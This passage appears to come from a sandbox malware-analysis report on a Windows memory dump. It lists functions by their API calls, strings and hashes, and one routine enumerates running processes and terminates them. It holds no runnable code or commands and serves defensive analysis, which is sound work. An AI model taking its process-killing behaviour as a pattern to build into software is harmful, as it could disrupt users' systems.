                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$ErrorLast
                • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                • API String ID: 1717984340-2085858615
                • Opcode ID: 719ee6fcb2298d1b002f77eaf5d8485eb079b0a0bda08e489b02245ded731d5b
                • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                • Opcode Fuzzy Hash: 719ee6fcb2298d1b002f77eaf5d8485eb079b0a0bda08e489b02245ded731d5b
                • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                APIs
                • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                • CloseHandle.KERNEL32(00000000), ref: 004124B7
                • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                • CloseHandle.KERNEL32(00000000), ref: 004124CD
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                • String ID: cmd.exe
                • API String ID: 2696918072-723907552
                • Opcode ID: fb95cca08c5137960df09b2932dfcea505f4a1a4214bf1a69b91f53fd9b4b180
                • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                • Opcode Fuzzy Hash: fb95cca08c5137960df09b2932dfcea505f4a1a4214bf1a69b91f53fd9b4b180
                • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                APIs
                • LoadLibraryW.KERNEL32(Shell32.dll,75DA4E90), ref: 0040F338
                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: SHGetFolderPathW$Shell32.dll$\
                • API String ID: 2574300362-2555811374
                • Opcode ID: 7bc3ac448c7b3a5af6e1c20c5236c889343e43b234a764f11d033459d4baacc3
                • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                • Opcode Fuzzy Hash: 7bc3ac448c7b3a5af6e1c20c5236c889343e43b234a764f11d033459d4baacc3
                • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _malloc$__except_handler4_fprintf
                • String ID: &#160;$Error encrypting message: %s$\\n
                • API String ID: 1783060780-3771355929
                • Opcode ID: bbf618f1c2959ab4ab92790a396c36c3b622b53a21a1d4a267143c9f61b62f09
                • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                • Opcode Fuzzy Hash: bbf618f1c2959ab4ab92790a396c36c3b622b53a21a1d4a267143c9f61b62f09
                • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _strncmp
                • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                • API String ID: 909875538-2908105608
                • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __aulldvrm
                • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                • API String ID: 1302938615-3129329331
                • Opcode ID: 971d9d698a671f16166e71a244131eb5e0c209e0610a0f0b5b3b839bc1fd0eaa
                • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                • Opcode Fuzzy Hash: 971d9d698a671f16166e71a244131eb5e0c209e0610a0f0b5b3b839bc1fd0eaa
                • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                APIs
                • timeGetTime.WINMM(?,?,?,?,0041EE2F), ref: 00411B1E
                • timeGetTime.WINMM(?,?,0041EE2F), ref: 00411B29
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                • DispatchMessageW.USER32(?), ref: 00411B5C
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                • Sleep.KERNEL32(00000064,?,?,0041EE2F), ref: 00411B72
                • timeGetTime.WINMM(?,?,0041EE2F), ref: 00411B78
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: MessageTimetime$Peek$DispatchSleep
                • String ID:
                • API String ID: 3697694649-0
                • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                APIs
                • __init_pointers.LIBCMT ref: 00425141
                  • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                  • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                  • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                • __mtinitlocks.LIBCMT ref: 00425146
                • __mtterm.LIBCMT ref: 0042514F
                  • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                  • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                  • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                • __calloc_crt.LIBCMT ref: 00425174
                • __initptd.LIBCMT ref: 00425196
                • GetCurrentThreadId.KERNEL32 ref: 0042519D
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                • String ID:
                • API String ID: 3567560977-0
                • Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                • Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                APIs
                • __lock.LIBCMT ref: 0042594A
                  • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                  • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                  • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(?,?,004250D7,0000000D), ref: 00428B22
                • _free.LIBCMT ref: 00425970
                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042500D,?,00423F7C,?,0041E6CC,00000000), ref: 00420C01
                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042500D,?,00423F7C,?,0041E6CC,00000000,?,?,?,?,?,004CB3EC), ref: 00420C13
                • __lock.LIBCMT ref: 00425989
                • ___removelocaleref.LIBCMT ref: 00425998
                • ___freetlocinfo.LIBCMT ref: 004259B1
                • _free.LIBCMT ref: 004259C4
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                • String ID:
                • API String ID: 626533743-0
                • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                APIs
                • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: ___from_strstr_to_strchr
                • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                • API String ID: 601868998-2416195885
                • Opcode ID: 6d0e854b80ffd72347278f6bb16eab8531bb2b7fdd0e65446e68d8b4e3059bbe
                • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                • Opcode Fuzzy Hash: 6d0e854b80ffd72347278f6bb16eab8531bb2b7fdd0e65446e68d8b4e3059bbe
                • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                APIs
                • __getptd_noexit.LIBCMT ref: 004C5D3D
                  • Part of subcall function 0042501F: GetLastError.KERNEL32(?,?,0042500D,?,00423F7C,?,0041E6CC,00000000,?,?,?,?,?,004CB3EC,000000FF), ref: 00425021
                  • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                  • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                  • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                  • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,?,0042500D,?,00423F7C,?,0041E6CC,00000000,?,?,?,?,?,004CB3EC,000000FF), ref: 00425083
                • __calloc_crt.LIBCMT ref: 004C5D60
                • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                Strings
                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                • API String ID: 3123740607-798102604
                • Opcode ID: f3e83e17f5aa232b289a94e568d891c3d39205db9f4a390e985e8908bc2b14e7
                • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                • Opcode Fuzzy Hash: f3e83e17f5aa232b289a94e568d891c3d39205db9f4a390e985e8908bc2b14e7
                • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                APIs
                • __getenv_helper_nolock.LIBCMT ref: 00441726
                • _strlen.LIBCMT ref: 00441734
                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                • _strnlen.LIBCMT ref: 004417BF
                • __lock.LIBCMT ref: 004417D0
                • __getenv_helper_nolock.LIBCMT ref: 004417DB
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                • String ID:
                • API String ID: 2168648987-0
                • Opcode ID: 7908139a20430730cad8562456387d525164ebbf3441293db37808c2cacb4cfc
                • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                • Opcode Fuzzy Hash: 7908139a20430730cad8562456387d525164ebbf3441293db37808c2cacb4cfc
                • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                APIs
                • _malloc.LIBCMT ref: 0043B70B
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00630000,00000000,00000001,00000000,00000000,00000000,?,00428CF4,00000000,00000000,00000000,00000000,?,00428BE1,00000018,00507BD0), ref: 00420CA5
                • _free.LIBCMT ref: 0043B71E
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap_free_malloc
                • String ID:
                • API String ID: 1020059152-0
                • Opcode ID: 5fc3e2221bdd699fffa991d086c47c2f053cf0c7b9ba8c4692043cbbc03a8838
                • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                • Opcode Fuzzy Hash: 5fc3e2221bdd699fffa991d086c47c2f053cf0c7b9ba8c4692043cbbc03a8838
                • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                APIs
                • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                • DispatchMessageW.USER32(?), ref: 0041F0B6
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                APIs
                • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                • DispatchMessageW.USER32(?), ref: 0041E546
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                APIs
                • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                • DispatchMessageW.USER32(?), ref: 0041FA7B
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                APIs
                • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                • DispatchMessageW.USER32(?), ref: 0041FE2B
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: d9b75942721a8a0ae071e27c76c5a1cf50cff94bf9e533d59e849fe7592e75e1
                • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                • Opcode Fuzzy Hash: d9b75942721a8a0ae071e27c76c5a1cf50cff94bf9e533d59e849fe7592e75e1
                • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
